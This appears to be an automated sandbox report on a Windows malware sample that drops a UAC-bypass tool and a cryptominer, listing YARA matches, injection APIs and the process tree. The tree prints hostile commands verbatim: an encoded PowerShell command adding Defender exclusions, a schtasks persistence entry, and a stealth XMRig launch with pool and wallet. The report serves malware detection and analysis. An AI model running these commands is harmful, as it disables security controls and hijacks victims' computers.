conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

Source: 0.2.GcqJPBLD2Q.exe.35f5ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 5.0.DccwBypassUAC.exe.7ff6fe420000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.GcqJPBLD2Q.exe.35e1868.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.GcqJPBLD2Q.exe.3609d68.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.GcqJPBLD2Q.exe.35e1868.1.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 5.2.DccwBypassUAC.exe.7ff6fe420000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 00000012.00000002.2234389210.0000025C64110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000012.00000002.2234389210.0000025C64110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000016.00000002.2255998341.000001D90D160000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000016.00000002.2255998341.000001D90D160000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000018.00000002.2249781552.0000000000845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000018.00000002.2249781552.0000000000845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000014.00000002.2235023601.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000014.00000002.2235023601.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000007.00000002.2189995465.00000236C4F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2189995465.00000236C4F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000011.00000002.2211357524.0000000000825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000011.00000002.2211357524.0000000000825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000017.00000002.2257559925.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000017.00000002.2257559925.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000F.00000002.2198853521.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000F.00000002.2198853521.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000E.00000002.2259611805.000001EC44910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2259611805.000001EC44910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000C.00000002.2213477315.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000002.2213477315.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2242162134.0000024769431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2232579749.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000004.00000002.2151276225.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.2151276225.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2263942655.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2260012653.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2244730823.000002476943C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2230448544.0000024769438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2243392476.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2241271993.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2256496200.0000024769432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2220629227.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 2848, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe, type: DROPPED	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth

Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Code function: 4_2_00401D58 NtAllocateVirtualMemory,	4_2_00401D58
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Code function: 4_2_00401D18 NtWriteVirtualMemory,	4_2_00401D18
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Code function: 4_2_004019D8 NtCreateThreadEx,	4_2_004019D8
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Code function: 4_2_00401D98 NtProtectVirtualMemory,	4_2_00401D98
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Code function: 4_2_00401C98 NtClose,	4_2_00401C98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 17_2_00401D58 NtAllocateVirtualMemory,	17_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 17_2_00401D18 NtWriteVirtualMemory,	17_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 17_2_004019D8 NtCreateThreadEx,	17_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 17_2_00401D98 NtProtectVirtualMemory,	17_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 17_2_00401C98 NtClose,	17_2_00401C98

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Code function: 0_2_00007FFD343F089D	0_2_00007FFD343F089D
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Code function: 0_2_00007FFD343F0568	0_2_00007FFD343F0568
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Code function: 0_2_00007FFD343F0B40	0_2_00007FFD343F0B40
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Code function: 0_2_00007FFD343F0500	0_2_00007FFD343F0500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343EACFA	2_2_00007FFD343EACFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343E2108	2_2_00007FFD343E2108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343EB9BA	2_2_00007FFD343EB9BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343EAD83	2_2_00007FFD343EAD83
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343EBAFA	2_2_00007FFD343EBAFA
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Code function: 5_2_00007FF6FE422F80	5_2_00007FF6FE422F80
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Code function: 5_2_00007FF6FE421CB0	5_2_00007FF6FE421CB0
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00000236C517E306	7_2_00000236C517E306
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00000236C517E6D6	7_2_00000236C517E6D6
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00000236C517EB0E	7_2_00000236C517EB0E
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00000236C517D6D2	7_2_00000236C517D6D2
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00000236C517EF6A	7_2_00000236C517EF6A
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00007FFD344A5EA2	7_2_00007FFD344A5EA2
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00007FFD344A50F6	7_2_00007FFD344A50F6
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000001EC44B2E6D6	14_2_000001EC44B2E6D6
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000001EC44B2E306	14_2_000001EC44B2E306
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000001EC44B2EF6A	14_2_000001EC44B2EF6A
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000001EC44B2EB0E	14_2_000001EC44B2EB0E
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000001EC44B2D6D2	14_2_000001EC44B2D6D2
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00007FFD344A516C	14_2_00007FFD344A516C
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00007FFD344A5F1C	14_2_00007FFD344A5F1C
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00007FFD344A159D	14_2_00007FFD344A159D
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_0000025C641148D6	18_2_0000025C641148D6
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_0000025C64114506	18_2_0000025C64114506
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_0000025C6411516A	18_2_0000025C6411516A
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_0000025C64114D0E	18_2_0000025C64114D0E
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_0000025C641138D2	18_2_0000025C641138D2
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_00007FFD344941A6	18_2_00007FFD344941A6
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_00007FFD34494F52	18_2_00007FFD34494F52
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_00007FFD34493CA9	18_2_00007FFD34493CA9
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001D90D37E6D6	22_2_000001D90D37E6D6
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001D90D37E306	22_2_000001D90D37E306
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001D90D37EF6A	22_2_000001D90D37EF6A
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001D90D37D6D2	22_2_000001D90D37D6D2
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001D90D37EB0E	22_2_000001D90D37EB0E
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00007FFD344A5EA2	22_2_00007FFD344A5EA2
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00007FFD344A50F6	22_2_00007FFD344A50F6
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00007FFD344A159D	22_2_00007FFD344A159D

Source: C:\Windows\System32\conhost.exe	Mutant created: NULL
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6012
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5156:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3468:120:WilError_03

Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\GcqJPBLD2Q.exe "C:\Users\user\Desktop\GcqJPBLD2Q.exe"
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAawBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAZgB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAcgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAeQBnACMAPgA="
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Users\user\AppData\Local\Temp\Cool.exe "C:\Users\user\AppData\Local\Temp\Cool.exe"
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe "C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Cool.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Local\Temp\services64.exe "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6012 -ip 6012
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6012 -s 880
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAawBlACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGkAZgB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGMAcgBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAeQBnACMAPgA="	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Users\user\AppData\Local\Temp\Cool.exe "C:\Users\user\AppData\Local\Temp\Cool.exe"	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Process created: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe "C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Cool.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Local\Temp\services64.exe "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\services64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6012 -ip 6012
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6012 -s 880
Source: C:\Windows\System32\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Section loaded: rsaenh.dll	Jump to behavior
